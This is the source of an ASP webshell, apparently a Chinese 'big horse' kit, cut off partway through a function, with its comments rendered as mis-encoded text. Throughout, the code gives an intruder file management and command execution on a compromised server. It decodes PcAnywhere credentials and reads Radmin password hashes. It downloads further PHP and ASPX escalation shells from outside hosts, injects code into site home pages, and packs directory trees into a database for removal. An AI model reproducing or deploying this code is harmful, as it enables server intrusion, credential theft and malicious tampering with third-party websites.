Untitled

<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%@ LANGUAGE = VBScript.Encode %><%

Server.ScriptTimeout=999999999

UserPass 	  ="deg3dfff5ffggdf"'      	  		ÃÜÂë,Í¨ÓÃÒ»¾ä»°,¿ÉÓÃ²Ëµ¶Á¬½Ó¡£

mNametitle	 ="ÉñÒ»ÑùµÄASp´óÂí"'   	   	  	   	 Ãû×Ö

Copyright 	  ="ÉñÄÚ²¿×¨ÓÃWEBSHELL,½ûÖ¹Ð¹Â¶"'				°æÈ¨

SItEuRl		 ="http://www.baidu.com"' 	  	  	 ÍøÕ¾µØÖ·

Const bs 	  =false'				ÎÄ×ÖÁ´½ÓÊÇ·ñ±äÉ«,trueÎªÊÇ,falseÎª·ñ

Const ShowFileIco=false'                               	 ÏÔÊ¾Í¼±ê(ÏÔÊ¾·½±ã¹ÜÀí,²»ÏÔÊ¾Ôö¼Ó·ÃÎÊËÙ¶È),trueÎªÏÔÊ¾Í¼±ê,falseÎªÓÃÎÄ×ÖÍ¼±ê

IcoPath  	  ="http://xxx.com/FileType/"'		Í¼±êÄ¿Â¼,×ÔÐÐÐÞ¸Ä(±¾¹¦ÄÜÐèÒª¡°ÏÔÊ¾Í¼±ê¡±¹¦ÄÜ¿ªÆô)

htp		 ="http://aspmuma.net/web/"' 	  	 ¹¦ÄÜµØÖ·

durl 	  	  ="http://ÄãµÄÍøÕ¾/ÒªÏÂÔØµÄ³ÌÐò.exe"'		ÏÂÔØ¹¦ÄÜÄ¬ÈÏÎÄ¼þµØÖ·

aspxt		 ="http://caocai.net/web/aspxÌáÈ¨´óÂí.txt"' 	 ASP.NETshellÄ¬ÈÏÏÂÔØµØÖ·£¬±¾³ÌÐòÄ¬ÈÏÃÜÂëadmin

phpt 	  	  ="http://caocai.net/web/phpÌáÈ¨´óÂí.txt"'	PHPshellÄ¬ÈÏÏÂÔØµØÖ·£¬±¾³ÌÐòÄ¬ÈÏÃÜÂëadmin

ms		 ="10"' 	  	  	  	  	 Í£ÁôÔÚ²éÑ¯Ò³¼¸Ãë

txt2="ÇëÊäÈëÄãÒª²åÈëµÄ´úÂë£¬ÐÞ¸ÄÊ×Ò³ÎÄ¼þÔÚµÚÒ»¸ö<td>µ½</td>´¦²åÈë´úÂë"
'(¹ÒÂí¹¦ÄÜ×Ô¶¯¼ÓÈëÄÚÈÝ£¬²»ÐèÊÖ¶¯Ìí¼Ó£¬´úÂë×ÔÐÐÉèÖÃ,²»ÁË½âµÄÅóÓÑÎð¶¯£¬Ä¬ÈÏÎª¿Õ,Ò²¿ÉÓÃ**Ô¶***³Ì***¶Á***È¡**Ä£Ê½¡£ÏêÇéÇë¿´½éÉÜ)


'Ö£ÖØÉùÃ÷:±¾³ÌÐòÎÞÈÎºÎºóÃÅ£¬Èô·¢ÏÖ±¾³ÌÐò±»¸Ä£¬¾ùÎªºóÃÅ³ÌÐò£¬ÇëÎðËæÒâÊ¹ÓÃ,Èô¸º·¨ÂÉÔðÈÎ£¬Óë×÷ÕßÎÞ¹Ø¡£
'					ÇëÎðÊ¹ÓÃ±¾³ÌÐò×öÈÎºÎ·Ç·¨ÓÃÍ¾£¬·ñÔòºó¹û×Ô¸º¡£


'2012ÄêÐÂÄêÉñ³¬Ô½°æ¡£

'¹¦ÄÜÈçÏÂ:-----------------------------------------------------
'¼¯ºÏÀÏ±øÍ¼Æ¬£¬×ÔÉí½â¡¢Ëø²¢¸½´ø²é¿´ËùÓÐ³ÌÐòÊÇ·ñ±»ÐÞ¸ÄÊôÐÔ£¬´´½¨¡¢×ª»¯´øµãÎÄ¼þ¼Ð,±£´æÎÄ¼þÎªÖ»¶ÁÊôÐÔ
'´´½¨ÏµÍ³±£ÁôÎÄ¼þÃû£¬WScript¸ÄÃû,shell.applicationÖ´ÐÐCMD
'×Ô¶¯ÏÔPR¡¢°Ù¶ÈÊÕÂ¼(ÐÞÕýBUG£¬²»»áÔì³É¿¨ËÀ).
'Ò»¼üÅúÁ¿É¨Ãè¿ÉÐ´Ä¿Â¼.
'Ò»¼üÏÂÔØasp.net¡¢php³ÌÐò(url¿É×ÔÉè)
'ÓÅ»¯CSS¡¢JS¡¢ASP´úÂë£¬Ìå»ý²»Ôö¼Ó.
'¸½´ø2009-2010Äê´ó²¿·ÖÌáÈ¡ÐÂ¹¦ÄÜ.
'È¥µôwmiÌáÈ¨,Ö±½Ó½¨Á¢ÓÃ»§,
'ÖØÒªÌáÊ¾£¬µÇÂ½½øÈëºó£¬Ä¬ÈÏÌø×ªµ½ÍøÕ¾¸ùÄ¿Â¼£¬¶ø²»ÊÇ±¾³ÌÐòÄ¿Â¼£¬Çë±ð¸ã´íÁË£¬ÒòÎª±¾³ÌÐòÄ¿Â¼ÎÄ¼þÓÐÊ±ºÜ¶à£¬Ôì³É¿¨ËÀÏÖÏó¡£
'¹ÒÂí¹¦ÄÜÊ±×Ô¶¯Ìí¼ÓÄÚÈÝÔ¶³Ì¶ÁÈ¡·½·¨:ÐÞ¸ÄÄ¬ÈÏ 	txt2="" 	Îª	 txt2=gethttppage("http://ÄãµÄtxtÔ¶³ÌµØÖ·/X.txt")
'Ôö¼ÓÁË¶Ô±äÌ¬Ä¾ÂíµÄÏÞÖÆ,Ö±½ÓÏÔÊ¾Ò»Ð©ÀàËÆÄ¾ÂíµÄÎÄ¼þºÍÊ×Ò³ÎÄ¼þ,¹úÄÚÊ×¿î¶Ô±äÌ¬Ä¾ÂíÏÞÖÆµÄASP WEB¹ÜÀí³ÌÐò.
'Ö§³Ö²Ëµ¶Á¬½Ó£¬ÃÜÂë¼´ÊÇµÇÂ½ÃÜÂë^_^
'¹¦ÄÜÈçÉÏ:-----------------------------------------------------
Response.Buffer =true
On Error Resume Next

sub ShowErr()
  If Err Then
j"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
Err.Clear:Response.Flush
  End If
end sub
Sub j(str)
response.write(str)
End Sub
Function RePath(S)
  RePath=Replace(S,"\","\\")
End Function
Function RRePath(S)
  RRePath=Replace(S,"\\","\")
End Function
URL=Request.ServerVariables("URL")
OOOO=Request.ServerVariables("PATH_TRANSLATED")
ServerIP=Request.ServerVariables("LOCAL_ADDR")
Action=Request("Action")
AChar=Request("AChar")
If AChar="" Then AChar="GB2312"
RootPath=Server.MapPath(".")
WWWRoot=Server.MapPath("/")
FolderPath=Request("FolderPath")
serveru=Request.ServerVariables("http_host")
serverp=userpass
FName=Request("FName")
ex=Request("ex")
pth=Request("pth")
incode=Request("insercode")
zhenz=Request("zhenz")
u=request.servervariables("http_host")&url
findbq=Request("findbq")
ASP_SELF=Request.ServerVariables("PATH_INFO")
Addpath=Server.MapPath("\")
Function ShiSanFun(ShiSanObjstr)
ShiSanObjstr = Replace(ShiSanObjstr, "©å", """")
For ShiSanI = 1 To Len(ShiSanObjstr)
 If Mid(ShiSanObjstr, ShiSanI, 1) <> "©ï" Then
ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) + ShiSanNewStr
 Else
ShiSanNewStr = vbCrLf + ShiSanNewStr
 End If
Next
ShiSanFun = ShiSanNewStr
End Function
cdx="<tr><td id=d width=95 onMouseOver=""this.style.backgroundColor='#696969'"" onMouseOut=""this.style.backgroundColor='#121212'"">":cxd="<font face='wingdings'>8</font>":zxc=22+73:ef="</a></td></tr>":set fso=server.CreateObject("Scripting.FileSystemObject"):set fsoX=server.CreateObject("Scripting.FileSystemObject"):str1="http://"&Request.ServerVariables("SERVER_Name")& left(Request.ServerVariables("URL"),InstrRev(Request.ServerVariables("URL"),"/")):BackUrl="<br><br><center><a href='javascript:history.back()'>·µ»Ø</a></center>":j"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312""><title>"&mNametitle&" - "&ServerIP&" </title><style type=""text/css"">body{margin-top:5px;background-color:#000000;color:#9c9393;font-size:12px;SCROLLBAR-FACE-COLOR:#232323;scrollbar-arrow-color:#383839;scrollbar-highlight-color:#000000;scrollbar-3dlight-color:#383839;scrollbar-shadow-color:#red}tr{background-color:#000000;}tr,td{margin-top:5px;color:#aaa;font-size:12px;SCROLLBAR-FACE-COLOR:red;scrollbar-arrow-color:#383839;scrollbar-highlight-color:#383838;scrollbar-3dlight-color:#dddddd;scrollbar-shadow-color:#232323}.sb{cursor:hand}input,select,textarea{border-top-width:1px;font-weight: bold;border-left-width: 1px;font-size:11px;border-left-color: #dddddd;background: #000000;border-bottom-width: 1px;border-bottom-color: #dddddd;color: #dddddd;border-top-color: #dddddd;font-family: verdana;border-right-width: 1px;border-right-color: #dddddd;}#d{background: #121212;padding-left:5px;padding-right:5px}pre{font-size: 11px;font-family: verdana;color: #dddddd;}hr{color: #dddddd;background-color: #dddddd;height: 5px;}#x{font-family: verdana;font-size:13px}a{color:#aaa;text-decoration:none;}.am{color:#aaa;font-size:11px;}</style>"
:if bs=true then:j"<script src="&htp&"1.js>":else:j"<script>":end if:j"function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm(""È·ÈÏÒªÖ´ÐÐ´Ë²Ù×÷Âð£¿""))return true;else return false;}function runClock(){theTime = window.setTimeout(""runClock()"", 100);var today = new Date();var display= today.toLocaleString();window.status=""¡ú"&mNametitle&"  --""+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction==""CopyFile""){DName = prompt(""ÇëÊäÈë¸´ÖÆµ½Ä¿±êÎÄ¼þÈ«Ãû³Æ"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFile""){DName = prompt(""ÇëÊäÈëÒÆ¶¯µ½Ä¿±êÎÄ¼þÈ«Ãû³Æ"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""CopyFolder""){DName = prompt(""ÇëÊäÈëÒÆ¶¯µ½Ä¿±êÎÄ¼þ¼ÐÈ«Ãû³Æ"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFolder""){DName = prompt(""ÇëÊäÈëÒÆ¶¯µ½Ä¿±êÎÄ¼þ¼ÐÈ«Ãû³Æ"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""NewFolder""){DName = prompt(""ÇëÊäÈëÒªÐÂ½¨µÄÎÄ¼þ¼ÐÈ«Ãû³Æ"",FName);top.hideform.FName.value = DName;}else{DName = ""Other"";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = """";}}function DbCheck(){if(DbForm.DbStr.value == """"){alert(""ÇëÏÈÁ¬½ÓÊý¾Ý¿â"");FullDbStr(0);return false;}return true;}function FullDbStr(i){if(i<0){return false;}Str=new Array(12);Str[0]=""Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&RePath(Session("FolderPath"))&"\\db.mdb;Jet OLEDB:Database Password=***"";Str[1]=""Driver={Sql Server};Server="&ServerIP&",1433;Database=DbName;Uid=sa;Pwd=****"";Str[2]=""Driver={MySql};Server="&ServerIP&";Port=3306;Database=DbName;Uid=root;Pwd=****"";Str[3]=""Dsn=DsnName"";Str[4]=""SELECT * FROM [TableName] WHERE ID<100"";Str[5]=""INSERT INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')"";Str[6]=""DELETE FROM [TableName] WHERE ID=100"";Str[7]=""UPDATE [TableName] SET USER=\'username\' WHERE ID=100"";Str[8]=""CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"";Str[9]=""DROP TABLE [TableName]"";Str[10]= ""ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"";Str[11]= ""ALTER TABLE [TableName] DROP COLUMN PASS"";Str[12]= ""µ±Ö»ÏÔÊ¾Ò»ÌõÊý¾ÝÊ±¼´¿ÉÏÔÊ¾×Ö¶ÎµÄÈ«²¿×Ö½Ú£¬¿ÉÓÃÌõ¼þ¿ØÖÆ²éÑ¯ÊµÏÖ.\n³¬¹ýÒ»ÌõÊý¾ÝÖ»ÏÔÊ¾×Ö¶ÎµÄÇ°ÎåÊ®¸ö×Ö½Ú¡£"";if(i<=3){DbForm.DbStr.value=Str[i];DbForm.SqlStr.value="""";abc.innerHTML=""<center>ÇëÈ·ÈÏ¼ºÁ¬½ÓÊý¾Ý¿âÔÙÊäÈëSQL²Ù×÷ÃüÁîÓï¾ä¡£</center>"";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value=Str[i];}return true;}function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert(""Çë¼ì²éÊý¾Ý¿âÁ¬½Ó´®ÊÇ·ñÕýÈ·!"");return false;}if(str.length<10){alert(""Çë¼ì²éSQLÓï¾äÊÇ·ñÕýÈ·!"");return false;}DbForm.SqlStr.value=str;DbForm.Page.value=pg;abc.innerHTML="""";DbForm.submit();return true;}function gotoURL(targ,selObj,restore){if(selObj.options[selObj.selectedIndex].js==1){eval(selObj.options[selObj.selectedIndex].value);if (restore) selObj.selectedIndex=0}else{eval(targ+"".location='""+selObj.options[selObj.selectedIndex].value+""'"");if (restore) selObj.selectedIndex=0;}}</script>"
j"<body" :If Action="" then j " scroll=no":j ">"
Dim ObT(19,2):Fn=Action:ObT(0,0) = "Scripting.FileSystemObject":ObT(0,2) = "ÎÄ ¼þ ²Ù ×÷ ×é ¼þ":ObT(1,0) = "wscript.shell":ObT(1,2) = "ÃüÁîÐÐÖ´ÐÐ×é¼þ":ObT(2,0) = "ADOX.Catalog":ObT(2,2) = "ACCESS ½¨ ¿â ×é ¼þ":ObT(3,0) = "JRO.JetEngine":ObT(3,2) = "ACCESS Ñ¹ Ëõ ×é ¼þ":ObT(4,0) = "Scripting.Dictionary":ObT(4,2) = "Êý¾ÝÁ÷ ÉÏ ´« ¸¨Öú ×é¼þ":ObT(5,0) = "Adodb.connection":ObT(5,2) = "Êý¾Ý¿â Á¬½Ó ×é¼þ":ObT(6,0) = "Adodb.Stream":ObT(6,2) = "Êý¾ÝÁ÷ ÉÏ´« ×é¼þ":ObT(7,0) = "SoftArtisans.FileUp":ObT(7,2) = "SA-FileUp ÎÄ¼þ ÉÏ´« ×é¼þ":ObT(8,0) = "LyfUpload.UploadFile":ObT(8,2) = "ÁõÔÆ·å ÎÄ¼þ ÉÏ´« ×é¼þ":ObT(9,0) = "Persits.Upload.1":ObT(9,2) = "ASPUpload ÎÄ¼þ ÉÏ´« ×é¼þ":ObT(10,0) = "JMail.SmtpMail":ObT(10,2) = "JMail ÓÊ¼þ ÊÕ·¢ ×é¼þ":ObT(11,0) = "CDONTS.NewMail":ObT(11,2) = "ÐéÄâSMTP ·¢ÐÅ ×é¼þ":ObT(12,0) = "SmtpMail.SmtpMail.1":ObT(12,2) = "SmtpMail ·¢ÐÅ ×é¼þ":ObT(13,0) = "Microsoft.XMLHTTP":ObT(13,2) = "Êý¾Ý ´«Êä ×é¼þ"
ObT(14,0) = "ws"&"cript.shell.1":  OBt(14,2) = "Èç¹ûwsh±»½û£¬¿ÉÒÔ¸ÄÓÃÕâ¸ö×é¼þ":OBT(15,0) = "WS"&"CRIPT.NETWORK":  OBt(15,2) = "²é¿´·þÎñÆ÷ÐÅÏ¢µÄ×é¼þ£¬ÓÐÊ±¿ÉÒÔÓÃÀ´ÌáÈ¨":OBT(16,0) = "she"&"ll.appl"&"ication":OBt(16,2) = "she"&"ll.appli"&"cation ²Ù×÷£¬ÎÞFSOÊ±²Ù×÷ÎÄ¼þÒÔ¼°Ö´ÐÐÃüÁî":OBT(17,0) = "sh"&"ell.appl"&"ication.1":OBt(17,2) = "she"&"ll.appli"&"cation µÄ±ðÃû£¬ÎÞFSOÊ±²Ù×÷ÎÄ¼þÒÔ¼°Ö´ÐÐÃüÁî":OBT(18,0) = "Shell.Users":OBt(18,2) = "É¾³ýÁËnet.exe net1.exeµÄÇé¿öÏÂÌí¼ÓÓÃ»§µÄ×é¼þ":OBT(19,0) = "MSXML2.ServerXMLHTTP":OBt(19,2) = "MSXML2.ServerXMLHTTP"
For i=0 To 19:Set T=Server.CreateObject(ObT(i,0)):If -2147221005 <> Err Then:IsObj=" ¡Ì":Else:IsObj=" ¡Á":Err.Clear:End If:Set T=Nothing:ObT(i,1)=IsObj:Next:If FolderPath<>"" then:Session("FolderPath")=RRePath(FolderPath):End If:If Session("FolderPath")="" Then:FolderPath=WwwRoot:Session("FolderPath")=FolderPath:End if:Function PcAnywhere4()
j"<div align='center'>PcAnywhereÌáÈ¨ Bin°æ±¾</div><form name='xform' method='post'><table width='80%'border='0'><tr><td width='10%'>cifÎÄ¼þ: </td><td width='10%'><input name='path' type='text' value='C:\Documents and Settings\All Users\Application Data\\Symantec\pcAnywhere\Citempl.cif' size='80'></td><td><input type='submit' value=' Ìá½» '></td></table>"
end Function
j"</form><script>function RUNonclick(){document.xform.china.name = parent.pwd.value;document.xform.action = parent.url.value;document.xform.submit();}</script>"
Function StreamLoadFromFile(sPath)
Dim oStream
Set oStream = Server.CreateObject("Adodb.Stream")
With oStream
.Type = 1
.Mode = 3
.Open
.LoadFromFile(sPath)
.Position = 0
StreamLoadFromFile = .Read
.Close
End With
Set oStream = Nothing
End Function
Function hexdec(strin)
Dim i, j, k, result
result = 0
For i = 1 To Len(strin)
If Mid(strin, i, 1) = "f" Or Mid(strin, i, 1) ="F" Then
 j = 15
End If
If Mid(strin, i, 1) = "e" Or Mid(strin, i, 1) = "E" Then
 j = 14
End If
If Mid(strin, i, 1) = "d" Or Mid(strin, i, 1) = "D" Then
 j = 13
End If
If Mid(strin, i, 1) = "c" Or Mid(strin, i, 1) = "C" Then
 j = 12
End If
If Mid(strin, i, 1) = "b" Or Mid(strin, i, 1) = "B" Then
 j = 11
End If
If Mid(strin, i, 1) = "a" Or Mid(strin, i, 1) = "A" Then
 j = 10
End If
If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then
 j = CInt(Mid(strin, i, 1))
End If
For k = 1 To Len(strin) - i
 j = j * 16
Next
result = result + j
Next
hexdec = result
End Function
Function PcAnywhere(data,mode)
HASH= Mid(data,3)
If mode = "pass" Then number = 32: Cifnum = 144
If mode = "user" Then number = 30: Cifnum = 15
For i = 1 To number Step 2
pcstr=((hexdec(Mid(data,i,2)) xor hexdec(Mid(hash,i,2))) xor Cifnum)
If ((pcstr <= 32) Or (pcstr>127)) Then Exit For
decode = decode + Chr(pcstr)
Cifnum=Cifnum+1
Next
PcAnywhere=decode
End function
Function bin2hex(binstr)
For i = 1 To LenB(binstr)
hexstr = Hex(AscB(MidB(binstr, i, 1)))
If Len(hexstr)=1 Then
bin2hex=bin2hex&"0"&(LCase(hexstr))
Else
bin2hex=bin2hex& LCase(hexstr)
End If
Next
End Function
CIF = Request("path")
If CIF <> "" Then
BinStr=StreamLoadFromFile(CIF)
j"Pcanywhere Reader ==><br><br>PATH:"&CIF&"<br>ÕÊºÅ:"&PcAnywhere (Mid(bin2hex(BinStr),919,64),"user")
j"<br>ÃÜÂë:"&PcAnywhere (Mid(bin2hex(BinStr),1177,32),"pass")
End If
Function radmin()
Set WSH= Server.CreateObject("WSCRIPT.SHELL")
RadminPath="HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\"
Parameter="Parameter"
Port = "Port"
j"<br>×¢Òâ:¶Á³öHASHÖµºóÓÃRadminHash¹¤¾ß»òodµ÷ÊÔÁ¬½Ó£¬¹¤¾ßÏÂÔØµØÖ·:"&htp&"soft/Radmin_hash.rar<br><br>"
ParameterArray=WSH.REGREAD(RadminPath & Parameter )
j Parameter&":"
If IsArray(ParameterArray) Then
For i = 0 To UBound(ParameterArray)
If  Len (hex(ParameterArray(i)))=1 Then
strObj = strObj & "0"&CStr(Hex(ParameterArray(i)))
Else
strObj = strObj & Hex(ParameterArray(i))
End If
Next
j strobj
Else
j"Error! Can't Read!"
End If
j"<br><br>"
PortArray=WSH.REGREAD(RadminPath & Port )
If IsArray(PortArray) Then
j Port &":"
j hextointer(CStr(Hex(PortArray(1)))&CStr(Hex(PortArray(0))))
Else
j"Error! Can't Read!"
End If
End Function
Function hextointer(strin)
Dim i, j, k, result
result = 0
For i = 1 To Len(strin)
If Mid(strin, i, 1) = "f" Or Mid(strin, i, 1) ="F" Then
j = 15
End If
If Mid(strin, i, 1) = "e" Or Mid(strin, i, 1) = "E" Then
j = 14
End If
If Mid(strin, i, 1) = "d" Or Mid(strin, i, 1) = "D" Then
j = 13
End If
If Mid(strin, i, 1) = "c" Or Mid(strin, i, 1) = "C" Then
j = 12
End If
If Mid(strin, i, 1) = "b" Or Mid(strin, i, 1) = "B" Then
j = 11
End If
If Mid(strin, i, 1) = "a" Or Mid(strin, i, 1) = "A" Then
j = 10
End If
If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then
j = CInt(Mid(strin, i, 1))
End If
For k = 1 To Len(strin) - i
j = j * 16
Next
result = result + j
Next
hextointer = result
End Function

Function MainForm()
j"<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame""><input type=""hidden"" name=""Action""><input type=""hidden"" name=""FName""></form><table width='100%'><form name='addrform' method='post' action='"&URL&"' target='_parent'><tr><td width='60' align='center'>µØÖ·£º</td><td><input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'></td><td width='140' align='center'><input name='Submit' type='submit' value='GO'> <input type='submit' value='Ë¢ÐÂ' onclick='FileFrame.location.reload()'></td></tr></form></table><table width='100%' height='95.5%' style='border:1px solid #000000;' cellpadding='0' cellspacing='0'><td width='160' id=tl><iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></iframe></td><td width=1 style='background:#000000'></td><td width=1 style='padding:2px'><a onclick=""document.getElementById('tl').style.display='none'"" href=##><b>Òþ²Ø</b></a><p><a onclick=""document.getElementById('tl').style.display=''"" href=##><b>ÏÔÊ¾</b></a></p></td><td width=1 style='background:#424242'><td><iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='1'></iframe>"

j"<tr><a class=am href='javascript:ShowFolder(""C:\\Program Files"")'>(1)¡¾Program¡¿<a><a class=am href='javascript:ShowFolder(""d:\\Program Files"")'>(2)¡¾ProgramD¡¿<a><a class=am href='javascript:ShowFolder(""e:\\Program Files"")'>(3)¡¾ProgramE¡¿<a><a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents"")'>(4)¡¾Documents¡¿<a><a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\"")'>(5)¡¾All_Users¡¿<a><a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\¡¸¿ªÊ¼¡¹²Ëµ¥\\"")'>(6)¡¾é_Ê¼_²Ë†Î¡¿<a><a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\¡¸¿ªÊ¼¡¹²Ëµ¥\\³ÌÐò\\"")'>(7)¡¾³Ì_Ðò¡¿<a><a class=am href='javascript:ShowFolder(""C:\\recycler"")'>(8)¡¾RECYCLER(C:\)¡¿<a><a class=am href='javascript:ShowFolder(""D:\\recycler"")'>(9)¡¾RECYCLER(d:\)¡¿<a><a class=am href='javascript:ShowFolder(""e:\\recycler"")'>(10)¡¾RECYCLER(e:\)¡¿<a>":j"<br><a class=am href='javascript:ShowFolder(""C:\\wmpub"")'>(1)¡¾wmpub¡¿<a><a class=am href='javascript:ShowFolder(""C:\\WINDOWS\\Temp"")'>&nbsp;&nbsp;(2)¡¾TEMP¡¿<a>&nbsp;&nbsp;&nbsp;&nbsp;<a class=am href='javascript:ShowFolder(""C:\\Program Files\\RhinoSoft.com"")'>(3)¡¾ServU(1)¡¿<a><a  class=am href='javascript:ShowFolder(""C:\\Program Files\\ServU"")'>(4)¡¾ServU(2)¡¿<a>&nbsp;<a class=am href='javascript:ShowFolder(""C:\\WINDOWS"")'>(5)¡¾WINDOWS¡¿<a>&nbsp;&nbsp;<a class=am href='javascript:ShowFolder(""C:\\php"")'>(6)¡¾PHP¡¿<a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a  class=am href='javascript:ShowFolder(""C:\\Program Files\\Microsoft SQL Server\\"")'>(7)¡¾Mssql¡¿<a><a class=am href='javascript:ShowFolder(""c:\\prel"")'>(8)¡¾prelÎÄ¼þ¼Ð¡¿<a>&nbsp;&nbsp;&nbsp;<a class=am href='javascript:ShowFolder(""c:\\docume~1\\alluse~1\\Application Data\\Symantec\\pcAnywhere"")'>(9)¡¾pcAnywhere¡¿<a>   <a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\×ÀÃæ"")'>(10)¡¾Alluser×ÀÃæ¡¿<a>":j"</td></tr></form></table></td></tr><tr><td width='170'><iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></iframe></td><td><iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='1'></iframe></td></tr></table>"

End Function

servrer="<br><br><br><center>±£»¤½ø³Ì¶ªÊ§£¬Çë<a href="&URL&" style=""text-decoration:underline;font-weight:bold"">ÖØÐÂÉú³É</a>±£»¤½ø³Ì¡£</center>"
Sub PageAddToMdb()
Dim theAct, thePath
theAct = Request("theAct")
thePath = Request("thePath")
Server.ScriptTimeOut=100000
If theAct = "addToMdb" Then
addToMdb(thePath)
j "<div align=center><br>²Ù×÷Íê³É!</div>"&BackUrl
Response.End
End If
If theAct = "releaseFromMdb" Then
unPack(thePath)
j "<div align=center><br>²Ù×÷Íê³É!</div>"&BackUrl
Response.End
End If
j"<br>ÎÄ¼þ¼Ð´ò°ü:<form method=post><input type=hidden name=""#"" value=Execute(Session(""#""))><input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=80><input type=hidden value=addToMdb name=theAct><select name=theMethod><option value=fso>FSO</option><option value=app>ÎÞFSO</option></select><input type=submit value='¿ªÊ¼´ò°ü'><br><br>×¢: ´ò°üÉú³ÉHSH.mdbÎÄ¼þ,Î»ÓÚsamÄ¾ÂíÍ¬¼¶Ä¿Â¼ÏÂ</form><hr/>ÎÄ¼þ°ü½â¿ª(ÐèFSOÖ§³Ö):<br/><form method=post><input type=hidden name=""#"" value=Execute(Session(""#""))><input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & "\HSH.mdb"" size=80><input type=hidden value=releaseFromMdb name=theAct><input type=submit value='½â¿ª°ü'><br><br>×¢: ½â¿ªÀ´µÄËùÓÐÎÄ¼þ¶¼Î»ÓÚ±¾³ÌÐòÄ¿Â¼ÏÂ</form>"
End Sub
Sub addToMdb(thePath)
On Error Resume Next
Dim rs, conn, stream, connStr, adoCatalog
Set rs = Server.CreateObject("ADODB.RecordSet")
Set stream = Server.CreateObject("ADODB.Stream")
Set conn = Server.CreateObject("ADODB.Connection")
Set adoCatalog = Server.CreateObject("ADOX.Catalog")
connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & Server.MapPath("HSH.mdb")
adoCatalog.Create connStr
conn.Open connStr
conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED, thePath VarChar, fileContent Image)")
stream.Open
stream.Type = 1
rs.Open "FileData", conn, 3, 3
If Request("theMethod") = "fso" Then
fsoTreeForMdb thePath, rs, stream
 Else
saTreeForMdb thePath, rs, stream
End If
rs.Close
Conn.Close
stream.Close
Set rs = Nothing
Set conn = Nothing
Set stream = Nothing
Set adoCatalog = Nothing
End Sub
Function fsoTreeForMdb(thePath, rs, stream)
Dim item, theFolder, folders, files, sysFileList
sysFileList = "$HSH.mdb$HSH.ldb$"
If Server.CreateObject("Scripting.FileSystemObject").FolderExists(thePath) = False Then
showErr(thePath & " Ä¿Â¼²»´æÔÚ»òÕß²»ÔÊÐí·ÃÎÊ!")
End If
Set theFolder = Server.CreateObject("Scripting.FileSystemObject").GetFolder(thePath)
Set files = theFolder.Files
Set folders = theFolder.SubFolders
For Each item In folders
fsoTreeForMdb item.Path, rs, stream
Next
For Each item In files
If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
rs.AddNew
rs("thePath") = Mid(item.Path, 4)
stream.LoadFromFile(item.Path)
rs("fileContent") = stream.Read()
rs.Update
End If
Next
Set files = Nothing
Set folders = Nothing
Set theFolder = Nothing
set fso=nothing
End Function

Sub unPack(thePath)
On Error Resume Next
Server.ScriptTimeOut=100000
Dim rs, ws, str, conn, stream, connStr, theFolder
str = Server.MapPath(".") & "\"
Set rs = CreateObject("ADODB.RecordSet")
Set stream = CreateObject("ADODB.Stream")
Set conn = CreateObject("ADODB.Connection")
connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & thePath & ";"
conn.Open connStr
rs.Open "FileData", conn, 1, 1
stream.Open
stream.Type = 1
Do Until rs.Eof
theFolder = Left(rs("thePath"), InStrRev(rs("thePath"), "\"))
If Server.CreateObject("Scripting.FileSystemObject").FolderExists(str & theFolder) = False Then
createFolder(str & theFolder)
End If
stream.SetEos()
stream.Write rs("fileContent")
stream.SaveToFile str & rs("thePath"), 2
rs.MoveNext
Loop
rs.Close
conn.Close
stream.Close
Set ws = Nothing
Set rs = Nothing
Set stream = Nothing
Set conn = Nothing
End Sub
Sub createFolder(thePath)
Dim i
i = Instr(thePath, "\")
Do While i > 0
If Server.CreateObject("Scripting.FileSystemObject").FolderExists(Left(thePath, i)) = False Then
Server.CreateObject("Scripting.FileSystemObject").CreateFolder(Left(thePath, i - 1))
End If
If InStr(Mid(thePath, i + 1), "\") Then
i = i + Instr(Mid(thePath, i + 1), "\")
 Else
i = 0
End If
Loop
End Sub
Sub saTreeForMdb(thePath, rs, stream)
